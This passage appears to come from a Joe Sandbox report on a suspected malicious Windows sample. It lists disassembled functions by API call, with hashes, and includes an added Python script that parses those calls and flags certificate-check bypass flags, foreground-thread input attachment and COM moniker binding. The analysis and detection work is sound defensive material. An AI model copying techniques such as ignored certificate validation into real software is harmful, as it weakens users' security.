                                                                                • Opcode ID: 3d5c23a9035239496ff606ded0f58cb682875f2d346b223a42cd540c99e8cec0
                                                                                • Instruction ID: 22fa240f904c4f21ce1d39a7eb443a7598856c21d9d656fb7e88bf3d19fe4188
                                                                                • Opcode Fuzzy Hash: 3d5c23a9035239496ff606ded0f58cb682875f2d346b223a42cd540c99e8cec0
                                                                                • Instruction Fuzzy Hash: F821F874A00114BFDB06EBA1DC86EFEB7B4EF45300F100215F661972D2DBB99915DB24
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003EBA73
                                                                                • GetDlgCtrlID.USER32 ref: 003EBA7E
                                                                                • GetParent.USER32 ref: 003EBA9A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003EBA9D
                                                                                • GetDlgCtrlID.USER32(?), ref: 003EBAA6
                                                                                • GetParent.USER32(?), ref: 003EBAC2
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 003EBAC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: 2132ab3e6d62e71d1d35b7c4bd2323940efe472932c3a26cb9da0552d81692b8
                                                                                • Instruction ID: 911b65dca0e5161acccb609ee7ba75711cd2f68441b222efeb99d8f796833067
                                                                                • Opcode Fuzzy Hash: 2132ab3e6d62e71d1d35b7c4bd2323940efe472932c3a26cb9da0552d81692b8
                                                                                • Instruction Fuzzy Hash: CA21CFB4A00108BBDF02ABA4CC86FFEBB79EF45300F100125F561A71D1DBB999199B24
                                                                                APIs
                                                                                • GetParent.USER32 ref: 003EBAE3
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 003EBAF8
                                                                                • _wcscmp.LIBCMT ref: 003EBB0A
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003EBB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                • Opcode ID: 4511035f383ddc6f0099db757414a0336544b40cc1b08c19fac6b3358054d599
                                                                                • Instruction ID: 4b8cc732f556cc8c59b44183c19adc0a4a7a2f0620fd0c40ebea3709735f9dd4
                                                                                • Opcode Fuzzy Hash: 4511035f383ddc6f0099db757414a0336544b40cc1b08c19fac6b3358054d599
                                                                                • Instruction Fuzzy Hash: E3112376608363FAFA276621AC07EA7B79C9B11B24F300223F904E41D5FBE5A8104518
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0040B2D5
                                                                                • CoInitialize.OLE32(00000000), ref: 0040B302
                                                                                • CoUninitialize.OLE32 ref: 0040B30C
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0040B40C
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0040B539
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0040B56D
                                                                                • CoGetObject.OLE32(?,00000000,0043D91C,?), ref: 0040B590
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0040B5A3
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040B623
                                                                                • VariantClear.OLEAUT32(0043D91C), ref: 0040B633
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                • Opcode ID: cd70ba3179e5066636f0380985f022e578de33b66cbd94e622ff4072a3d36978
                                                                                • Instruction ID: b5e6660e3686ba7d086da5b434e0344c70329e6f3a021bfd8ce7718eb46016a9
                                                                                • Opcode Fuzzy Hash: cd70ba3179e5066636f0380985f022e578de33b66cbd94e622ff4072a3d36978
                                                                                • Instruction Fuzzy Hash: FAC12771604301AFC700DF64C884A6BB7E9FF88308F10496EF989AB291D775ED05CB9A
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 003DACC1
                                                                                  • Part of subcall function 003D7CF4: __mtinitlocknum.LIBCMT ref: 003D7D06
                                                                                  • Part of subcall function 003D7CF4: EnterCriticalSection.KERNEL32(00000000,?,003D7ADD,0000000D), ref: 003D7D1F
                                                                                • __calloc_crt.LIBCMT ref: 003DACD2
                                                                                  • Part of subcall function 003D6986: __calloc_impl.LIBCMT ref: 003D6995
                                                                                  • Part of subcall function 003D6986: Sleep.KERNEL32(00000000,000003BC,003CF507,?,0000000E), ref: 003D69AC
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 003DACED
                                                                                • GetStartupInfoW.KERNEL32(?,00466E28,00000064,003D5E91,00466C70,00000014), ref: 003DAD46
                                                                                • __calloc_crt.LIBCMT ref: 003DAD91
                                                                                • GetFileType.KERNEL32(00000001), ref: 003DADD8
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003DAE11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1426640281-0
                                                                                • Opcode ID: e3b27981a05f48403500798f2469538bc12b51070b354ea8601203ba5fe3b3cb
                                                                                • Instruction ID: bfe286391206bf3a08624e3a8854c5ddb480f3cc1018421dc6b982ed26292a4c
                                                                                • Opcode Fuzzy Hash: e3b27981a05f48403500798f2469538bc12b51070b354ea8601203ba5fe3b3cb
                                                                                • Instruction Fuzzy Hash: 5981F6B2D05B418FDB15CF68E9405ADBBF4AF05320B24426EE4A6AB3D1D7349843CB56
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003F4047
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F405B
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 003F4062
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4071
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 003F4083
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F409C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F40AE
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F40F3
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4108
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4113
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: dafdab8fca87c685559fade17b58693590c4f4398b3032fb65512381e59d4faf
                                                                                • Instruction ID: 2d877616e34d210773176ddc38cc71cb577623786b30946bc0cfabb8f8d80147
                                                                                • Opcode Fuzzy Hash: dafdab8fca87c685559fade17b58693590c4f4398b3032fb65512381e59d4faf
                                                                                • Instruction Fuzzy Hash: 3531B972500209AFEB12DF64EC46B7A77BDFB94312F118125FA09D6260DB74DD808B59
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 003CB496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 003CB4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 003CB4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 003CB4BD
                                                                                • GetClientRect.USER32(?), ref: 0042DD63
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0042DD7A
                                                                                • GetWindowDC.USER32(?), ref: 0042DD86
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0042DD95
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0042DDA7
                                                                                • GetSysColor.USER32(00000005), ref: 0042DDC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3430376129-0
                                                                                • Opcode ID: 89c9556869324589ffbd7e1c135e7055501e646552ee19d0f19fbfc258a6adbb
                                                                                • Instruction ID: 87cc56cd637d11fb832429aa3375c0be90f7d6b9d1261c5764c693aa116f8358
                                                                                • Opcode Fuzzy Hash: 89c9556869324589ffbd7e1c135e7055501e646552ee19d0f19fbfc258a6adbb
                                                                                • Instruction Fuzzy Hash: 9A114931900605FFDB216FB4FC0AFA97B75EB08325F118635FA66950E2CB324951EB25
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003B30DC
                                                                                • CoUninitialize.OLE32(?,00000000), ref: 003B3181
                                                                                • UnregisterHotKey.USER32(?), ref: 003B32A9
                                                                                • DestroyWindow.USER32(?), ref: 00425079
                                                                                • FreeLibrary.KERNEL32(?), ref: 004250F8
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00425125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: 079ad37f184ac8837c92ad27381510298a9346d848567d9ef9817381ad95377d
                                                                                • Instruction ID: a2971bb788c40f37194ee73233535a8b728611a1ee1fa18b92764db094f4887a
                                                                                • Opcode Fuzzy Hash: 079ad37f184ac8837c92ad27381510298a9346d848567d9ef9817381ad95377d
                                                                                • Instruction Fuzzy Hash: B9913E347001268FC716EF14D895BA9F3B4FF05308F5482A9E60AAB662DF34AE56CF54
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 003CCC15
                                                                                  • Part of subcall function 003CCCCD: GetClientRect.USER32(?,?), ref: 003CCCF6
                                                                                  • Part of subcall function 003CCCCD: GetWindowRect.USER32(?,?), ref: 003CCD37
                                                                                  • Part of subcall function 003CCCCD: ScreenToClient.USER32(?,?), ref: 003CCD5F
                                                                                • GetDC.USER32 ref: 0042D137
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042D14A
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042D158
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042D16D
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0042D175
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0042D200
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: ae0d926fc899c3686083b983ecf1f7d4d0a22038d04da7f30f9d6199085c1d72
                                                                                • Instruction ID: 64a8b6fd0ae75d765200dddea9a3787a967d93877420b386daa300119e8f576a
                                                                                • Opcode Fuzzy Hash: ae0d926fc899c3686083b983ecf1f7d4d0a22038d04da7f30f9d6199085c1d72
                                                                                • Instruction Fuzzy Hash: C071E330A00205DFCF228F64D881EFA7BB5FF48314F14826AED599A2A5C7358C91DB58
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                  • Part of subcall function 003CB63C: GetCursorPos.USER32(000000FF), ref: 003CB64F
                                                                                  • Part of subcall function 003CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000001), ref: 003CB691
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000002), ref: 003CB69F
                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0041ED3C
                                                                                • ImageList_EndDrag.COMCTL32 ref: 0041ED42
                                                                                • ReleaseCapture.USER32 ref: 0041ED48
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0041EDF0
                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0041EE03
                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0041EEDC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                • API String ID: 1924731296-2107944366
                                                                                • Opcode ID: 7bfa04e3a2be68fe7d90b262e4496e95db38e81055173ba2d37704a9b7b5a0e9
                                                                                • Instruction ID: c451798a4219f8be7a6393ce60cfa11863c8802f4439cbadae369bc09c8cdf65
                                                                                • Opcode Fuzzy Hash: 7bfa04e3a2be68fe7d90b262e4496e95db38e81055173ba2d37704a9b7b5a0e9
                                                                                • Instruction Fuzzy Hash: 7C51BC74204300AFD710DF24DC86FAA77E4FB88718F00492EFA959B2E2DB749994CB56
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004045FF
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040462B
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0040466D
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00404682
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040468F
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004046BF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404706
                                                                                  • Part of subcall function 00405052: GetLastError.KERNEL32(?,?,004043CC,00000000,00000000,00000001), ref: 00405067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                • String ID:
                                                                                • API String ID: 1241431887-3916222277
                                                                                • Opcode ID: 9863f11838522a1ae4668c29b586e97b69775b9dadb95726d1626c5bc450d1f7
                                                                                • Instruction ID: b410a0adf492bc40c7f6387f8e996218b44ffa30ebedeffad5e0463a1eca5117
                                                                                • Opcode Fuzzy Hash: 9863f11838522a1ae4668c29b586e97b69775b9dadb95726d1626c5bc450d1f7
                                                                                • Instruction Fuzzy Hash: 484180B1500204BFEB019F50DC85FBB77ACEF49314F00413AFA05AA281E77999449BA8
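Added example, not part of the Joe Sandbox report or its IDA plugin output: a small Python triage script that parses API lines in the record format used above and flags three call patterns that appear in this section. The first is InternetSetOptionW with dwOption 0x1F, which is INTERNET_OPTION_SECURITY_FLAGS in wininet.h; the listing renders the lpBuffer slot as 00000100, and if that immediate is the flag word itself rather than a pointer (an assumption the listing cannot settle), it is SECURITY_FLAG_IGNORE_UNKNOWN_CA, i.e. the request would accept a certificate from an untrusted CA. The second is GetForegroundWindow followed by AttachThreadInput, the usual way to attach to the foreground thread's input queue and sidestep foreground-window restrictions. The third is GetRunningObjectTable/CoGetObject, binding to a COM object through a moniker. All three are consistent with the AutoIt runtime that the report's signature section already suggests, so they describe the interpreter rather than the embedded script and by themselves do not show what the script does. The sample lines are copied from records in this report; the rule names, the Call/Finding types and the output format are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed input: API lines copied verbatim from function records in this report.
SAMPLE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004045FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0040466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00404682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040468F
  • Part of subcall function 00405052: GetLastError.KERNEL32(?,?,004043CC,00000000,00000000,00000001), ref: 00405067
• GetCurrentThreadId.KERNEL32 ref: 003F4047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F405B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4071
• GetRunningObjectTable.OLE32(00000000,?), ref: 0040B40C
• CoGetObject.OLE32(?,00000000,0043D91C,?), ref: 0040B590
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003B30DC
"""

# One record line: optional "Part of subcall function X:" prefix, Api.Module, optional
# argument list, optional "ref: <address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# wininet.h constants (hypothetical only in the sense that the listing does not name them).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {  # bits that relax certificate validation
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[Union[int, str, None]]  # int immediates, str literals, None for "?"
    ref: Optional[int]
    subcall: Optional[int] = None      # address of the subcall function, if any


@dataclass
class Finding:
    rule: str
    ref: Optional[int]
    detail: List[str] = field(default_factory=list)


def _arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None            # value not resolved by the static analysis
    try:
        return int(tok, 16)    # immediate rendered as hex
    except ValueError:
        return tok             # string literal such as "close all"


def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Memory Dump Source"
        raw = m.group("args")
        calls.append(Call(
            api=m.group("api"), module=m.group("mod"),
            args=[_arg(t) for t in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16) if m.group("ref") else None,
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def triage(calls: List[Call]) -> List[Finding]:
    findings = []
    seen = {c.api for c in calls}
    for c in calls:
        if (c.api == "InternetSetOptionW" and len(c.args) >= 4
                and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS):
            # Joe Sandbox renders the lpBuffer slot as an immediate. Assumption: if that
            # immediate is the flag word rather than a pointer, decode the bits it would set.
            buf = c.args[2] if isinstance(c.args[2], int) else 0
            bits = [name for bit, name in SECURITY_FLAGS.items() if buf & bit]
            findings.append(Finding("wininet_security_flags_set", c.ref, bits))
    if {"GetForegroundWindow", "AttachThreadInput"} <= seen:
        first = next(c for c in calls if c.api == "AttachThreadInput")
        findings.append(Finding("foreground_thread_input_attach", first.ref))
    if {"GetRunningObjectTable", "CoGetObject"} & seen:
        first = next(c for c in calls if c.api in ("GetRunningObjectTable", "CoGetObject"))
        findings.append(Finding("com_moniker_bind", first.ref))
    return findings


if __name__ == "__main__":
    for f in triage(parse_calls(SAMPLE)):
        print(f"{f.rule:32s} ref={f.ref or 0:08X} {' '.join(f.detail)}")
```

The parser tolerates the three line shapes seen in these records (with arguments, without any parentheses, and the indented "Part of subcall function" form) and keeps unresolved `?` slots as None so a rule can distinguish "unknown" from zero. Pasting a whole "APIs" block into SAMPLE is enough to run it against another function record.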
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044DC00), ref: 0040B715
                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044DC00), ref: 0040B749
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0040B8C1
                                                                                • SysFreeString.OLEAUT32(?), ref: 0040B8EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004124F5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00412688
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004126AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004126EC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0041270E
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041286F
